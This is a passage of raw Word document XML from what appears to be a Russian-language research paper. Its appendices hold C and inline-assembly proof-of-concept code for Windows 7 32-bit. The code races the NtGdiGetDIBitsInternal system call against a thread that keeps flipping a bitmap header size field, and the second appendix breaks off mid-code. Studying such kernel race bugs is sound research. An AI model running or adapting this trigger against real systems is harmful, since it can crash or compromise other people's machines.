          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {mov eax, ApiNumber};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C092E"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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {lea edx, ApiNumber + 4};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E68E37A"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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__asm</w:t>
      </w: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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x2e};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBC140"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17617D75"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216B6BE"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w: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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WINAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ThreadProc(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPVOID</w:t>
      </w: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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lpParameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D4435"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> xor_op = </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPCOREHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) ^ </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE6D09"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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E09CC8F"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globals::header.bcSize ^= xor_op;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F95F11"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p>
    <w:p w14:paraId="21C0F634"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1F95E"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0B841C6"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C00C5E"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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Windows 7 32-bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA74EE7"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONST</w:t>
      </w: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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ULONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> __NR_NtGdiGetDIBitsInternal = 0x10b3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768ADC11"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8296472"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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Initialize the graphic subsystem for this process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FF5562"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LoadLibraryA(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"gdi32.dll"</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B86FD"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9F67172"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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Create the flipping thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6B24F1"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CreateThread(</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, ThreadProc, </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, </w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F74F50F"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4EA338B"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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Race the implementation in this thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C80EF9"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83AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00783AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F33821" w14:textId="77777777" w:rsidR="00783AE2" w:rsidRPr="00783AE2"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SystemCall32(__NR_NtGdiGetDIBitsInternal, 0, 1, 0, 1, 1, &amp;globals::header, 0, 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD2360" w14:textId="77777777" w:rsidR="00783AE2" w:rsidRPr="0075529D"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83AE2">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C030E78" w14:textId="77777777" w:rsidR="00783AE2" w:rsidRPr="0075529D"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5529D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4EB6FB" w14:textId="77777777" w:rsidR="00783AE2" w:rsidRPr="0075529D"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5529D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CEAD87" w14:textId="77777777" w:rsidR="00783AE2" w:rsidRPr="0075529D" w:rsidRDefault="00783AE2" w:rsidP="00783AE2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E11A0C" w14:textId="0265D5FB" w:rsidR="00E41021" w:rsidRDefault="00E41021" w:rsidP="00BD665F">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7207523F" w14:textId="1DEB2776" w:rsidR="00C36C17" w:rsidRDefault="00C36C17">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Courier New" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="615594FC" w14:textId="444A28BC" w:rsidR="00C36C17" w:rsidRPr="0075529D" w:rsidRDefault="00C36C17" w:rsidP="00C36C17">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06575019"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA89284"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;assert.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0409BE14"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4CDBCDE"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8000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// For native 32-bit execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D33B95"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>extern</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"C"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A1A00A"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ULONG</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CDECL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SystemCall32(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApiNumber</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ...) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08858278"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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{mov eax, ApiNumber};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EAD91D"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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{lea edx, ApiNumber + 4};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097E4C2"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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x2e};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2FBB4C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28311DC4"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F4FA2CB"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D254799"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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Windows 7 32-bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A388A2F"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONST</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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ULONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> __NR_NtGdiGetDIBitsInternal = 0x10b3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABBFB3"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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Initialize the graphic subsystem for this process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE60169"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LoadLibraryA(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"gdi32.dll"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA1348"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008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Load an external bitmap as HBITMAP and select it in the device context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618283CD" w14:textId="42745553" w:rsidR="00C36C17" w:rsidRPr="00937369" w:rsidRDefault="00C36C17" w:rsidP="00C36C17">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HDC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hdc = CreateCompatibleDC(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C36C17">
        <w:rPr>
